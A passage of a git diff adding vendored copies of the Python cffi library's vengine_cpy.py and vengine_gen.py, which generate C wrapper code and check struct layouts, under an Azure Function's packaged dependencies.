(prefix, name)).strip() + self._struct_pending_verification[tp] = layout, cname + + def _loaded_struct_or_union(self, tp): + if tp.fldnames is None: + return # nothing to do with opaque structs + self.ffi._get_cached_btype(tp) # force 'fixedlayout' to be considered + + if tp in self._struct_pending_verification: + # check that the layout sizes and offsets match the real ones + def check(realvalue, expectedvalue, msg): + if realvalue != expectedvalue: + raise VerificationError( + "%s (we have %d, but C compiler says %d)" + % (msg, expectedvalue, realvalue)) + ffi = self.ffi + BStruct = ffi._get_cached_btype(tp) + layout, cname = self._struct_pending_verification.pop(tp) + check(layout[0], ffi.sizeof(BStruct), "wrong total size") + check(layout[1], ffi.alignof(BStruct), "wrong total alignment") + i = 2 + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + check(layout[i], ffi.offsetof(BStruct, fname), + "wrong offset for field %r" % (fname,)) + if layout[i+1] != 0: + BField = ffi._get_cached_btype(ftype) + check(layout[i+1], ffi.sizeof(BField), + "wrong size for field %r" % (fname,)) + i += 2 + assert i == len(layout) + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a typedef. + + _generate_cpy_anonymous_collecttype = _generate_nothing + + def _generate_cpy_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_cpy_enum_decl(tp, name, '') + else: + self._generate_struct_or_union_decl(tp, '', name) + + def _generate_cpy_anonymous_method(self, tp, name): + if not isinstance(tp, model.EnumType): + self._generate_struct_or_union_method(tp, '', name) + + def _loading_cpy_anonymous(self, tp, name, module): + if isinstance(tp, model.EnumType): + self._loading_cpy_enum(tp, name, module) + else: + self._loading_struct_or_union(tp, '', name, module) + + def _loaded_cpy_anonymous(self, tp, name, module, **kwds): + if isinstance(tp, model.EnumType): + self._loaded_cpy_enum(tp, name, module, **kwds) + else: + self._loaded_struct_or_union(tp) + + # ---------- + # constants, likely declared with '#define' + + def _generate_cpy_const(self, is_int, name, tp=None, category='const', + vartp=None, delayed=True, size_too=False, + check_value=None): + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + prnt('static int %s(PyObject *lib)' % funcname) + prnt('{') + prnt(' PyObject *o;') + prnt(' int res;') + if not is_int: + prnt(' %s;' % (vartp or tp).get_c_name(' i', name)) + else: + assert category == 'const' + # + if check_value is not None: + self._check_int_constant_value(name, check_value) + # + if not is_int: + if category == 'var': + realexpr = '&' + name + else: + realexpr = name + prnt(' i = (%s);' % (realexpr,)) + prnt(' o = %s;' % (self._convert_expr_from_c(tp, 'i', + 'variable type'),)) + assert delayed + else: + prnt(' o = _cffi_from_c_int_const(%s);' % name) + prnt(' if (o == NULL)') + prnt(' return -1;') + if size_too: + prnt(' {') + prnt(' PyObject *o1 = o;') + prnt(' o = Py_BuildValue("On", o1, (Py_ssize_t)sizeof(%s));' + % (name,)) + prnt(' Py_DECREF(o1);') + prnt(' if (o == NULL)') + prnt(' return -1;') + prnt(' }') + prnt(' res = PyObject_SetAttrString(lib, "%s", o);' % name) + prnt(' Py_DECREF(o);') + prnt(' if (res < 0)') + prnt(' return -1;') + prnt(' return %s;' % self._chained_list_constants[delayed]) + self._chained_list_constants[delayed] = funcname + '(lib)' + prnt('}') + prnt() + + def _generate_cpy_constant_collecttype(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + if not is_int: + self._do_collect_type(tp) + + def _generate_cpy_constant_decl(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + self._generate_cpy_const(is_int, name, tp) + + _generate_cpy_constant_method = _generate_nothing + _loading_cpy_constant = _loaded_noop + _loaded_cpy_constant = _loaded_noop + + # ---------- + # enums + + def _check_int_constant_value(self, name, value, err_prefix=''): + prnt = self._prnt + if value <= 0: + prnt(' if ((%s) > 0 || (long)(%s) != %dL) {' % ( + name, name, value)) + else: + prnt(' if ((%s) <= 0 || (unsigned long)(%s) != %dUL) {' % ( + name, name, value)) + prnt(' char buf[64];') + prnt(' if ((%s) <= 0)' % name) + prnt(' snprintf(buf, 63, "%%ld", (long)(%s));' % name) + prnt(' else') + prnt(' snprintf(buf, 63, "%%lu", (unsigned long)(%s));' % + name) + prnt(' PyErr_Format(_cffi_VerificationError,') + prnt(' "%s%s has the real value %s, not %s",') + prnt(' "%s", "%s", buf, "%d");' % ( + err_prefix, name, value)) + prnt(' return -1;') + prnt(' }') + + def _enum_funcname(self, prefix, name): + # "$enum_$1" => "___D_enum____D_1" + name = name.replace('$', '___D_') + return '_cffi_e_%s_%s' % (prefix, name) + + def _generate_cpy_enum_decl(self, tp, name, prefix='enum'): + if tp.partial: + for enumerator in tp.enumerators: + self._generate_cpy_const(True, enumerator, delayed=False) + return + # + funcname = self._enum_funcname(prefix, name) + prnt = self._prnt + prnt('static int %s(PyObject *lib)' % funcname) + prnt('{') + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + self._check_int_constant_value(enumerator, enumvalue, + "enum %s: " % name) + prnt(' return %s;' % self._chained_list_constants[True]) + self._chained_list_constants[True] = funcname + '(lib)' + prnt('}') + prnt() + + _generate_cpy_enum_collecttype = _generate_nothing + _generate_cpy_enum_method = _generate_nothing + + def _loading_cpy_enum(self, tp, name, module): + if tp.partial: + enumvalues = [getattr(module, enumerator) + for enumerator in tp.enumerators] + tp.enumvalues = tuple(enumvalues) + tp.partial_resolved = True + + def _loaded_cpy_enum(self, tp, name, module, library): + for enumerator, enumvalue in zip(tp.enumerators, tp.enumvalues): + setattr(library, enumerator, enumvalue) + + # ---------- + # macros: for now only for integers + + def _generate_cpy_macro_decl(self, tp, name): + if tp == '...': + check_value = None + else: + check_value = tp # an integer + self._generate_cpy_const(True, name, check_value=check_value) + + _generate_cpy_macro_collecttype = _generate_nothing + _generate_cpy_macro_method = _generate_nothing + _loading_cpy_macro = _loaded_noop + _loaded_cpy_macro = _loaded_noop + + # ---------- + # global variables + + def _generate_cpy_variable_collecttype(self, tp, name): + if isinstance(tp, model.ArrayType): + tp_ptr = model.PointerType(tp.item) + else: + tp_ptr = model.PointerType(tp) + self._do_collect_type(tp_ptr) + + def _generate_cpy_variable_decl(self, tp, name): + if isinstance(tp, model.ArrayType): + tp_ptr = model.PointerType(tp.item) + self._generate_cpy_const(False, name, tp, vartp=tp_ptr, + size_too = tp.length_is_unknown()) + else: + tp_ptr = model.PointerType(tp) + self._generate_cpy_const(False, name, tp_ptr, category='var') + + _generate_cpy_variable_method = _generate_nothing + _loading_cpy_variable = _loaded_noop + + def _loaded_cpy_variable(self, tp, name, module, library): + value = getattr(library, name) + if isinstance(tp, model.ArrayType): # int a[5] is "constant" in the + # sense that "a=..." is forbidden + if tp.length_is_unknown(): + assert isinstance(value, tuple) + (value, size) = value + BItemType = self.ffi._get_cached_btype(tp.item) + length, rest = divmod(size, self.ffi.sizeof(BItemType)) + if rest != 0: + raise VerificationError( + "bad size: %r does not seem to be an array of %s" % + (name, tp.item)) + tp = tp.resolve_length(length) + # 'value' is a which we have to replace with + # a if the N is actually known + if tp.length is not None: + BArray = self.ffi._get_cached_btype(tp) + value = self.ffi.cast(BArray, value) + setattr(library, name, value) + return + # remove ptr= from the library instance, and replace + # it by a property on the class, which reads/writes into ptr[0]. + ptr = value + delattr(library, name) + def getter(library): + return ptr[0] + def setter(library, value): + ptr[0] = value + setattr(type(library), name, property(getter, setter)) + type(library)._cffi_dir.append(name) + + # ---------- + + def _generate_setup_custom(self): + prnt = self._prnt + prnt('static int _cffi_setup_custom(PyObject *lib)') + prnt('{') + prnt(' return %s;' % self._chained_list_constants[True]) + prnt('}') + +cffimod_header = r''' +#include +#include + +/* this block of #ifs should be kept exactly identical between + c/_cffi_backend.c, cffi/vengine_cpy.py, cffi/vengine_gen.py + and cffi/_cffi_include.h */ +#if defined(_MSC_VER) +# include /* for alloca() */ +# if _MSC_VER < 1600 /* MSVC < 2010 */ + typedef __int8 int8_t; + typedef __int16 int16_t; + typedef __int32 int32_t; + typedef __int64 int64_t; + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + typedef unsigned __int64 uint64_t; + typedef __int8 int_least8_t; + typedef __int16 int_least16_t; + typedef __int32 int_least32_t; + typedef __int64 int_least64_t; + typedef unsigned __int8 uint_least8_t; + typedef unsigned __int16 uint_least16_t; + typedef unsigned __int32 uint_least32_t; + typedef unsigned __int64 uint_least64_t; + typedef __int8 int_fast8_t; + typedef __int16 int_fast16_t; + typedef __int32 int_fast32_t; + typedef __int64 int_fast64_t; + typedef unsigned __int8 uint_fast8_t; + typedef unsigned __int16 uint_fast16_t; + typedef unsigned __int32 uint_fast32_t; + typedef unsigned __int64 uint_fast64_t; + typedef __int64 intmax_t; + typedef unsigned __int64 uintmax_t; +# else +# include +# endif +# if _MSC_VER < 1800 /* MSVC < 2013 */ +# ifndef __cplusplus + typedef unsigned char _Bool; +# endif +# endif +#else +# include +# if (defined (__SVR4) && defined (__sun)) || defined(_AIX) || defined(__hpux) +# include +# endif +#endif + +#if PY_MAJOR_VERSION < 3 +# undef PyCapsule_CheckExact +# undef PyCapsule_GetPointer +# define PyCapsule_CheckExact(capsule) (PyCObject_Check(capsule)) +# define PyCapsule_GetPointer(capsule, name) \ + (PyCObject_AsVoidPtr(capsule)) +#endif + +#if PY_MAJOR_VERSION >= 3 +# define PyInt_FromLong PyLong_FromLong +#endif + +#define _cffi_from_c_double PyFloat_FromDouble +#define _cffi_from_c_float PyFloat_FromDouble +#define _cffi_from_c_long PyInt_FromLong +#define _cffi_from_c_ulong PyLong_FromUnsignedLong +#define _cffi_from_c_longlong PyLong_FromLongLong +#define _cffi_from_c_ulonglong PyLong_FromUnsignedLongLong +#define _cffi_from_c__Bool PyBool_FromLong + +#define _cffi_to_c_double PyFloat_AsDouble +#define _cffi_to_c_float PyFloat_AsDouble + +#define _cffi_from_c_int_const(x) \ + (((x) > 0) ? \ + ((unsigned long long)(x) <= (unsigned long long)LONG_MAX) ? \ + PyInt_FromLong((long)(x)) : \ + PyLong_FromUnsignedLongLong((unsigned long long)(x)) : \ + ((long long)(x) >= (long long)LONG_MIN) ? \ + PyInt_FromLong((long)(x)) : \ + PyLong_FromLongLong((long long)(x))) + +#define _cffi_from_c_int(x, type) \ + (((type)-1) > 0 ? /* unsigned */ \ + (sizeof(type) < sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + sizeof(type) == sizeof(long) ? \ + PyLong_FromUnsignedLong((unsigned long)x) : \ + PyLong_FromUnsignedLongLong((unsigned long long)x)) : \ + (sizeof(type) <= sizeof(long) ? \ + PyInt_FromLong((long)x) : \ + PyLong_FromLongLong((long long)x))) + +#define _cffi_to_c_int(o, type) \ + ((type)( \ + sizeof(type) == 1 ? (((type)-1) > 0 ? (type)_cffi_to_c_u8(o) \ + : (type)_cffi_to_c_i8(o)) : \ + sizeof(type) == 2 ? (((type)-1) > 0 ? (type)_cffi_to_c_u16(o) \ + : (type)_cffi_to_c_i16(o)) : \ + sizeof(type) == 4 ? (((type)-1) > 0 ? (type)_cffi_to_c_u32(o) \ + : (type)_cffi_to_c_i32(o)) : \ + sizeof(type) == 8 ? (((type)-1) > 0 ? (type)_cffi_to_c_u64(o) \ + : (type)_cffi_to_c_i64(o)) : \ + (Py_FatalError("unsupported size for type " #type), (type)0))) + +#define _cffi_to_c_i8 \ + ((int(*)(PyObject *))_cffi_exports[1]) +#define _cffi_to_c_u8 \ + ((int(*)(PyObject *))_cffi_exports[2]) +#define _cffi_to_c_i16 \ + ((int(*)(PyObject *))_cffi_exports[3]) +#define _cffi_to_c_u16 \ + ((int(*)(PyObject *))_cffi_exports[4]) +#define _cffi_to_c_i32 \ + ((int(*)(PyObject *))_cffi_exports[5]) +#define _cffi_to_c_u32 \ + ((unsigned int(*)(PyObject *))_cffi_exports[6]) +#define _cffi_to_c_i64 \ + ((long long(*)(PyObject *))_cffi_exports[7]) +#define _cffi_to_c_u64 \ + ((unsigned long long(*)(PyObject *))_cffi_exports[8]) +#define _cffi_to_c_char \ + ((int(*)(PyObject *))_cffi_exports[9]) +#define _cffi_from_c_pointer \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[10]) +#define _cffi_to_c_pointer \ + ((char *(*)(PyObject *, CTypeDescrObject *))_cffi_exports[11]) +#define _cffi_get_struct_layout \ + ((PyObject *(*)(Py_ssize_t[]))_cffi_exports[12]) +#define _cffi_restore_errno \ + ((void(*)(void))_cffi_exports[13]) +#define _cffi_save_errno \ + ((void(*)(void))_cffi_exports[14]) +#define _cffi_from_c_char \ + ((PyObject *(*)(char))_cffi_exports[15]) +#define _cffi_from_c_deref \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[16]) +#define _cffi_to_c \ + ((int(*)(char *, CTypeDescrObject *, PyObject *))_cffi_exports[17]) +#define _cffi_from_c_struct \ + ((PyObject *(*)(char *, CTypeDescrObject *))_cffi_exports[18]) +#define _cffi_to_c_wchar_t \ + ((wchar_t(*)(PyObject *))_cffi_exports[19]) +#define _cffi_from_c_wchar_t \ + ((PyObject *(*)(wchar_t))_cffi_exports[20]) +#define _cffi_to_c_long_double \ + ((long double(*)(PyObject *))_cffi_exports[21]) +#define _cffi_to_c__Bool \ + ((_Bool(*)(PyObject *))_cffi_exports[22]) +#define _cffi_prepare_pointer_call_argument \ + ((Py_ssize_t(*)(CTypeDescrObject *, PyObject *, char **))_cffi_exports[23]) +#define _cffi_convert_array_from_object \ + ((int(*)(char *, CTypeDescrObject *, PyObject *))_cffi_exports[24]) +#define _CFFI_NUM_EXPORTS 25 + +typedef struct _ctypedescr CTypeDescrObject; + +static void *_cffi_exports[_CFFI_NUM_EXPORTS]; +static PyObject *_cffi_types, *_cffi_VerificationError; + +static int _cffi_setup_custom(PyObject *lib); /* forward */ + +static PyObject *_cffi_setup(PyObject *self, PyObject *args) +{ + PyObject *library; + int was_alive = (_cffi_types != NULL); + (void)self; /* unused */ + if (!PyArg_ParseTuple(args, "OOO", &_cffi_types, &_cffi_VerificationError, + &library)) + return NULL; + Py_INCREF(_cffi_types); + Py_INCREF(_cffi_VerificationError); + if (_cffi_setup_custom(library) < 0) + return NULL; + return PyBool_FromLong(was_alive); +} + +union _cffi_union_alignment_u { + unsigned char m_char; + unsigned short m_short; + unsigned int m_int; + unsigned long m_long; + unsigned long long m_longlong; + float m_float; + double m_double; + long double m_longdouble; +}; + +struct _cffi_freeme_s { + struct _cffi_freeme_s *next; + union _cffi_union_alignment_u alignment; +}; + +#ifdef __GNUC__ + __attribute__((unused)) +#endif +static int _cffi_convert_array_argument(CTypeDescrObject *ctptr, PyObject *arg, + char **output_data, Py_ssize_t datasize, + struct _cffi_freeme_s **freeme) +{ + char *p; + if (datasize < 0) + return -1; + + p = *output_data; + if (p == NULL) { + struct _cffi_freeme_s *fp = (struct _cffi_freeme_s *)PyObject_Malloc( + offsetof(struct _cffi_freeme_s, alignment) + (size_t)datasize); + if (fp == NULL) + return -1; + fp->next = *freeme; + *freeme = fp; + p = *output_data = (char *)&fp->alignment; + } + memset((void *)p, 0, (size_t)datasize); + return _cffi_convert_array_from_object(p, ctptr, arg); +} + +#ifdef __GNUC__ + __attribute__((unused)) +#endif +static void _cffi_free_array_arguments(struct _cffi_freeme_s *freeme) +{ + do { + void *p = (void *)freeme; + freeme = freeme->next; + PyObject_Free(p); + } while (freeme != NULL); +} + +static int _cffi_init(void) +{ + PyObject *module, *c_api_object = NULL; + + module = PyImport_ImportModule("_cffi_backend"); + if (module == NULL) + goto failure; + + c_api_object = PyObject_GetAttrString(module, "_C_API"); + if (c_api_object == NULL) + goto failure; + if (!PyCapsule_CheckExact(c_api_object)) { + PyErr_SetNone(PyExc_ImportError); + goto failure; + } + memcpy(_cffi_exports, PyCapsule_GetPointer(c_api_object, "cffi"), + _CFFI_NUM_EXPORTS * sizeof(void *)); + + Py_DECREF(module); + Py_DECREF(c_api_object); + return 0; + + failure: + Py_XDECREF(module); + Py_XDECREF(c_api_object); + return -1; +} + +#define _cffi_type(num) ((CTypeDescrObject *)PyList_GET_ITEM(_cffi_types, num)) + +/**********/ +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py new file mode 100644 index 0000000..72e144d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/vengine_gen.py @@ -0,0 +1,675 @@ +# +# DEPRECATED: implementation for ffi.verify() +# +import sys, os +import types + +from . import model +from .error import VerificationError + + +class VGenericEngine(object): + _class_key = 'g' + _gen_python_module = False + + def __init__(self, verifier): + self.verifier = verifier + self.ffi = verifier.ffi + self.export_symbols = [] + self._struct_pending_verification = {} + + def patch_extension_kwds(self, kwds): + # add 'export_symbols' to the dictionary. Note that we add the + # list before filling it. When we fill it, it will thus also show + # up in kwds['export_symbols']. + kwds.setdefault('export_symbols', self.export_symbols) + + def find_module(self, module_name, path, so_suffixes): + for so_suffix in so_suffixes: + basename = module_name + so_suffix + if path is None: + path = sys.path + for dirname in path: + filename = os.path.join(dirname, basename) + if os.path.isfile(filename): + return filename + + def collect_types(self): + pass # not needed in the generic engine + + def _prnt(self, what=''): + self._f.write(what + '\n') + + def write_source_to_f(self): + prnt = self._prnt + # first paste some standard set of lines that are mostly '#include' + prnt(cffimod_header) + # then paste the C source given by the user, verbatim. + prnt(self.verifier.preamble) + # + # call generate_gen_xxx_decl(), for every xxx found from + # ffi._parser._declarations. This generates all the functions. + self._generate('decl') + # + # on Windows, distutils insists on putting init_cffi_xyz in + # 'export_symbols', so instead of fighting it, just give up and + # give it one + if sys.platform == 'win32': + if sys.version_info >= (3,): + prefix = 'PyInit_' + else: + prefix = 'init' + modname = self.verifier.get_module_name() + prnt("void %s%s(void) { }\n" % (prefix, modname)) + + def load_library(self, flags=0): + # import it with the CFFI backend + backend = self.ffi._backend + # needs to make a path that contains '/', on Posix + filename = os.path.join(os.curdir, self.verifier.modulefilename) + module = backend.load_library(filename, flags) + # + # call loading_gen_struct() to get the struct layout inferred by + # the C compiler + self._load(module, 'loading') + + # build the FFILibrary class and instance, this is a module subclass + # because modules are expected to have usually-constant-attributes and + # in PyPy this means the JIT is able to treat attributes as constant, + # which we want. + class FFILibrary(types.ModuleType): + _cffi_generic_module = module + _cffi_ffi = self.ffi + _cffi_dir = [] + def __dir__(self): + return FFILibrary._cffi_dir + library = FFILibrary("") + # + # finally, call the loaded_gen_xxx() functions. This will set + # up the 'library' object. + self._load(module, 'loaded', library=library) + return library + + def _get_declarations(self): + lst = [(key, tp) for (key, (tp, qual)) in + self.ffi._parser._declarations.items()] + lst.sort() + return lst + + def _generate(self, step_name): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + try: + method = getattr(self, '_generate_gen_%s_%s' % (kind, + step_name)) + except AttributeError: + raise VerificationError( + "not implemented in verify(): %r" % name) + try: + method(tp, realname) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _load(self, module, step_name, **kwds): + for name, tp in self._get_declarations(): + kind, realname = name.split(' ', 1) + method = getattr(self, '_%s_gen_%s' % (step_name, kind)) + try: + method(tp, realname, module, **kwds) + except Exception as e: + model.attach_exception_info(e, name) + raise + + def _generate_nothing(self, tp, name): + pass + + def _loaded_noop(self, tp, name, module, **kwds): + pass + + # ---------- + # typedefs: generates no code so far + + _generate_gen_typedef_decl = _generate_nothing + _loading_gen_typedef = _loaded_noop + _loaded_gen_typedef = _loaded_noop + + # ---------- + # function declarations + + def _generate_gen_function_decl(self, tp, name): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + # cannot support vararg functions better than this: check for its + # exact type (including the fixed arguments), and build it as a + # constant function pointer (no _cffi_f_%s wrapper) + self._generate_gen_const(False, name, tp) + return + prnt = self._prnt + numargs = len(tp.args) + argnames = [] + for i, type in enumerate(tp.args): + indirection = '' + if isinstance(type, model.StructOrUnion): + indirection = '*' + argnames.append('%sx%d' % (indirection, i)) + context = 'argument of %s' % name + arglist = [type.get_c_name(' %s' % arg, context) + for type, arg in zip(tp.args, argnames)] + tpresult = tp.result + if isinstance(tpresult, model.StructOrUnion): + arglist.insert(0, tpresult.get_c_name(' *r', context)) + tpresult = model.void_type + arglist = ', '.join(arglist) or 'void' + wrappername = '_cffi_f_%s' % name + self.export_symbols.append(wrappername) + if tp.abi: + abi = tp.abi + ' ' + else: + abi = '' + funcdecl = ' %s%s(%s)' % (abi, wrappername, arglist) + context = 'result of %s' % name + prnt(tpresult.get_c_name(funcdecl, context)) + prnt('{') + # + if isinstance(tp.result, model.StructOrUnion): + result_code = '*r = ' + elif not isinstance(tp.result, model.VoidType): + result_code = 'return ' + else: + result_code = '' + prnt(' %s%s(%s);' % (result_code, name, ', '.join(argnames))) + prnt('}') + prnt() + + _loading_gen_function = _loaded_noop + + def _loaded_gen_function(self, tp, name, module, library): + assert isinstance(tp, model.FunctionPtrType) + if tp.ellipsis: + newfunction = self._load_constant(False, tp, name, module) + else: + indirections = [] + base_tp = tp + if (any(isinstance(typ, model.StructOrUnion) for typ in tp.args) + or isinstance(tp.result, model.StructOrUnion)): + indirect_args = [] + for i, typ in enumerate(tp.args): + if isinstance(typ, model.StructOrUnion): + typ = model.PointerType(typ) + indirections.append((i, typ)) + indirect_args.append(typ) + indirect_result = tp.result + if isinstance(indirect_result, model.StructOrUnion): + if indirect_result.fldtypes is None: + raise TypeError("'%s' is used as result type, " + "but is opaque" % ( + indirect_result._get_c_name(),)) + indirect_result = model.PointerType(indirect_result) + indirect_args.insert(0, indirect_result) + indirections.insert(0, ("result", indirect_result)) + indirect_result = model.void_type + tp = model.FunctionPtrType(tuple(indirect_args), + indirect_result, tp.ellipsis) + BFunc = self.ffi._get_cached_btype(tp) + wrappername = '_cffi_f_%s' % name + newfunction = module.load_function(BFunc, wrappername) + for i, typ in indirections: + newfunction = self._make_struct_wrapper(newfunction, i, typ, + base_tp) + setattr(library, name, newfunction) + type(library)._cffi_dir.append(name) + + def _make_struct_wrapper(self, oldfunc, i, tp, base_tp): + backend = self.ffi._backend + BType = self.ffi._get_cached_btype(tp) + if i == "result": + ffi = self.ffi + def newfunc(*args): + res = ffi.new(BType) + oldfunc(res, *args) + return res[0] + else: + def newfunc(*args): + args = args[:i] + (backend.newp(BType, args[i]),) + args[i+1:] + return oldfunc(*args) + newfunc._cffi_base_type = base_tp + return newfunc + + # ---------- + # named structs + + def _generate_gen_struct_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'struct', name) + + def _loading_gen_struct(self, tp, name, module): + self._loading_struct_or_union(tp, 'struct', name, module) + + def _loaded_gen_struct(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_gen_union_decl(self, tp, name): + assert name == tp.name + self._generate_struct_or_union_decl(tp, 'union', name) + + def _loading_gen_union(self, tp, name, module): + self._loading_struct_or_union(tp, 'union', name, module) + + def _loaded_gen_union(self, tp, name, module, **kwds): + self._loaded_struct_or_union(tp) + + def _generate_struct_or_union_decl(self, tp, prefix, name): + if tp.fldnames is None: + return # nothing to do with opaque structs + checkfuncname = '_cffi_check_%s_%s' % (prefix, name) + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + cname = ('%s %s' % (prefix, name)).strip() + # + prnt = self._prnt + prnt('static void %s(%s *p)' % (checkfuncname, cname)) + prnt('{') + prnt(' /* only to generate compile-time warnings or errors */') + prnt(' (void)p;') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if (isinstance(ftype, model.PrimitiveType) + and ftype.is_integer_type()) or fbitsize >= 0: + # accept all integers, but complain on float or double + prnt(' (void)((p->%s) << 1);' % fname) + else: + # only accept exactly the type declared. + try: + prnt(' { %s = &p->%s; (void)tmp; }' % ( + ftype.get_c_name('*tmp', 'field %r'%fname, quals=fqual), + fname)) + except VerificationError as e: + prnt(' /* %s */' % str(e)) # cannot verify it, ignore + prnt('}') + self.export_symbols.append(layoutfuncname) + prnt('intptr_t %s(intptr_t i)' % (layoutfuncname,)) + prnt('{') + prnt(' struct _cffi_aligncheck { char x; %s y; };' % cname) + prnt(' static intptr_t nums[] = {') + prnt(' sizeof(%s),' % cname) + prnt(' offsetof(struct _cffi_aligncheck, y),') + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + prnt(' offsetof(%s, %s),' % (cname, fname)) + if isinstance(ftype, model.ArrayType) and ftype.length is None: + prnt(' 0, /* %s */' % ftype._get_c_name()) + else: + prnt(' sizeof(((%s *)0)->%s),' % (cname, fname)) + prnt(' -1') + prnt(' };') + prnt(' return nums[i];') + prnt(' /* the next line is not executed, but compiled */') + prnt(' %s(0);' % (checkfuncname,)) + prnt('}') + prnt() + + def _loading_struct_or_union(self, tp, prefix, name, module): + if tp.fldnames is None: + return # nothing to do with opaque structs + layoutfuncname = '_cffi_layout_%s_%s' % (prefix, name) + # + BFunc = self.ffi._typeof_locked("intptr_t(*)(intptr_t)")[0] + function = module.load_function(BFunc, layoutfuncname) + layout = [] + num = 0 + while True: + x = function(num) + if x < 0: break + layout.append(x) + num += 1 + if isinstance(tp, model.StructOrUnion) and tp.partial: + # use the function()'s sizes and offsets to guide the + # layout of the struct + totalsize = layout[0] + totalalignment = layout[1] + fieldofs = layout[2::2] + fieldsize = layout[3::2] + tp.force_flatten() + assert len(fieldofs) == len(fieldsize) == len(tp.fldnames) + tp.fixedlayout = fieldofs, fieldsize, totalsize, totalalignment + else: + cname = ('%s %s' % (prefix, name)).strip() + self._struct_pending_verification[tp] = layout, cname + + def _loaded_struct_or_union(self, tp): + if tp.fldnames is None: + return # nothing to do with opaque structs + self.ffi._get_cached_btype(tp) # force 'fixedlayout' to be considered + + if tp in self._struct_pending_verification: + # check that the layout sizes and offsets match the real ones + def check(realvalue, expectedvalue, msg): + if realvalue != expectedvalue: + raise VerificationError( + "%s (we have %d, but C compiler says %d)" + % (msg, expectedvalue, realvalue)) + ffi = self.ffi + BStruct = ffi._get_cached_btype(tp) + layout, cname = self._struct_pending_verification.pop(tp) + check(layout[0], ffi.sizeof(BStruct), "wrong total size") + check(layout[1], ffi.alignof(BStruct), "wrong total alignment") + i = 2 + for fname, ftype, fbitsize, fqual in tp.enumfields(): + if fbitsize >= 0: + continue # xxx ignore fbitsize for now + check(layout[i], ffi.offsetof(BStruct, fname), + "wrong offset for field %r" % (fname,)) + if layout[i+1] != 0: + BField = ffi._get_cached_btype(ftype) + check(layout[i+1], ffi.sizeof(BField), + "wrong size for field %r" % (fname,)) + i += 2 + assert i == len(layout) + + # ---------- + # 'anonymous' declarations. These are produced for anonymous structs + # or unions; the 'name' is obtained by a typedef. + + def _generate_gen_anonymous_decl(self, tp, name): + if isinstance(tp, model.EnumType): + self._generate_gen_enum_decl(tp, name, '') + else: + self._generate_struct_or_union_decl(tp, '', name) + + def _loading_gen_anonymous(self, tp, name, module): + if isinstance(tp, model.EnumType): + self._loading_gen_enum(tp, name, module, '') + else: + self._loading_struct_or_union(tp, '', name, module) + + def _loaded_gen_anonymous(self, tp, name, module, **kwds): + if isinstance(tp, model.EnumType): + self._loaded_gen_enum(tp, name, module, **kwds) + else: + self._loaded_struct_or_union(tp) + + # ---------- + # constants, likely declared with '#define' + + def _generate_gen_const(self, is_int, name, tp=None, category='const', + check_value=None): + prnt = self._prnt + funcname = '_cffi_%s_%s' % (category, name) + self.export_symbols.append(funcname) + if check_value is not None: + assert is_int + assert category == 'const' + prnt('int %s(char *out_error)' % funcname) + prnt('{') + self._check_int_constant_value(name, check_value) + prnt(' return 0;') + prnt('}') + elif is_int: + assert category == 'const' + prnt('int %s(long long *out_value)' % funcname) + prnt('{') + prnt(' *out_value = (long long)(%s);' % (name,)) + prnt(' return (%s) <= 0;' % (name,)) + prnt('}') + else: + assert tp is not None + assert check_value is None + if category == 'var': + ampersand = '&' + else: + ampersand = '' + extra = '' + if category == 'const' and isinstance(tp, model.StructOrUnion): + extra = 'const *' + ampersand = '&' + prnt(tp.get_c_name(' %s%s(void)' % (extra, funcname), name)) + prnt('{') + prnt(' return (%s%s);' % (ampersand, name)) + prnt('}') + prnt() + + def _generate_gen_constant_decl(self, tp, name): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + self._generate_gen_const(is_int, name, tp) + + _loading_gen_constant = _loaded_noop + + def _load_constant(self, is_int, tp, name, module, check_value=None): + funcname = '_cffi_const_%s' % name + if check_value is not None: + assert is_int + self._load_known_int_constant(module, funcname) + value = check_value + elif is_int: + BType = self.ffi._typeof_locked("long long*")[0] + BFunc = self.ffi._typeof_locked("int(*)(long long*)")[0] + function = module.load_function(BFunc, funcname) + p = self.ffi.new(BType) + negative = function(p) + value = int(p[0]) + if value < 0 and not negative: + BLongLong = self.ffi._typeof_locked("long long")[0] + value += (1 << (8*self.ffi.sizeof(BLongLong))) + else: + assert check_value is None + fntypeextra = '(*)(void)' + if isinstance(tp, model.StructOrUnion): + fntypeextra = '*' + fntypeextra + BFunc = self.ffi._typeof_locked(tp.get_c_name(fntypeextra, name))[0] + function = module.load_function(BFunc, funcname) + value = function() + if isinstance(tp, model.StructOrUnion): + value = value[0] + return value + + def _loaded_gen_constant(self, tp, name, module, library): + is_int = isinstance(tp, model.PrimitiveType) and tp.is_integer_type() + value = self._load_constant(is_int, tp, name, module) + setattr(library, name, value) + type(library)._cffi_dir.append(name) + + # ---------- + # enums + + def _check_int_constant_value(self, name, value): + prnt = self._prnt + if value <= 0: + prnt(' if ((%s) > 0 || (long)(%s) != %dL) {' % ( + name, name, value)) + else: + prnt(' if ((%s) <= 0 || (unsigned long)(%s) != %dUL) {' 